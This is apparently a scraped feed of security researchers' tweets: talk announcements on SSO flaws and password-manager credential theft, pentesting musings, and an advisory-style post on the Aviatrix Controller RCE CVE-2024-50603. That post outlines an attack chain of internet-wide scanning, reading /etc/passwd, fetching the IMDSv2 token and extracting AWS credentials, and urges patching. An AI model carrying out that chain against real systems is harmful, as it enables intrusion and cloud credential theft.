Authentication was always hard. Mateusz @molejarka will present recent examples of security problems related to OAuth and OpenID Connect and issues in GCP and Azure.
📣 “CAse study of Recently DIscovered vulNerAbiLities in Single sIgn oN mechaniSms”
🎫 https://t.co/9nLmpjltUf
🚨The new unauthenticated RCE affecting Aviatrix Controllers (CVE-2024-50603) is the real deal - with a single POST request 🫠 and a super trivial exploit, it takes less than 30 seconds to:
1. Collect all Aviatrix Controllers over the internet
2. Validate exploitability with nuclei template that fetches /etc/passwd
3. Fetch IMDSv2 token
4. Extract AWS Credentials
5. GG
If your company uses Aviatrix Controller I'd advise patching immediately & assume compromise since January 7th.
Original blog: https://t.co/cDHNfUBTc8
@wiz_io exploitation in the wild: https://t.co/WLTy2dGmwq
POC for extracting IMDSv2 token & AWS Keys -
Stay Safe & until the next one 🫡
🛡️ We added #Aviatrix Controller OS command injection vulnerability CVE-2024-50603 to our Known Exploited Vulnerabilities Catalog. Visit https://t.co/myxOwap1Tf & apply mitigations to protect your org from cyberattacks. #Cybersecurity#InfoSec
Uwierzytelnienie użytkownika to sprawa trudna. Ostatnie lata przyniosły nam wysyp i coraz większą adopcję rozwiązań Single Sign On. 🔒 To i dobrze, i źle. Dlaczego? O tym dokładniej opowie Mateusz @molejarka!
Jego wykład zobaczycie już 26 listopada 🔜 https://t.co/0LxLipoOnN
@nnwakelam Pentest may be dull, but you get stable income, no bad triage experience and no discussion about payout amount, you get money when you tested the scope and it does not matter when you found something or not 😎😜
@nnwakelam I stopped doing bug bounty some time ago. For me personally it was few cases, when 1. I had to wait a long long time for triage 2. I hit P1 but got money as for P2 3. I got silent fix and duplicate/unable to reproduce. 🤷♂️
@naugtur Sure, most apps do have an existing session assuming that the phone unlock is enough, some apps require auth anyway, it depends what app you write
That’s hard - stopping the #pentest because you have the deadline and not being sure that you did everything and checked everywhere. Detailed scope and checklists help a bit but it’s still hard.
One day I'm going to design a TryHackMe room with a few minor vulns and a practically impossible to find (without source code) RCE to get the flag.
The entire point of the box is to teach people it's OK to stop looking and give up.
As pentesters, we have a limited amount of time testing things. You will miss stuff that later attackers will find. That's OK.
I got a confirmation from @bookingcom in a DM that indeed this is how it’s supposed to work - the hotel sends you an email with a random looking link asking to provide credit card information and you should do it, otherwise they have a right to cancel your reservation
Join us at @TyphoonCon in Seoul on May 27-31!
@_r3ggi will talk about broken isolation and draining credentials from popular macOS password managers.
#typhooncon#itsec#cybersec
https://t.co/n5lq4fo52G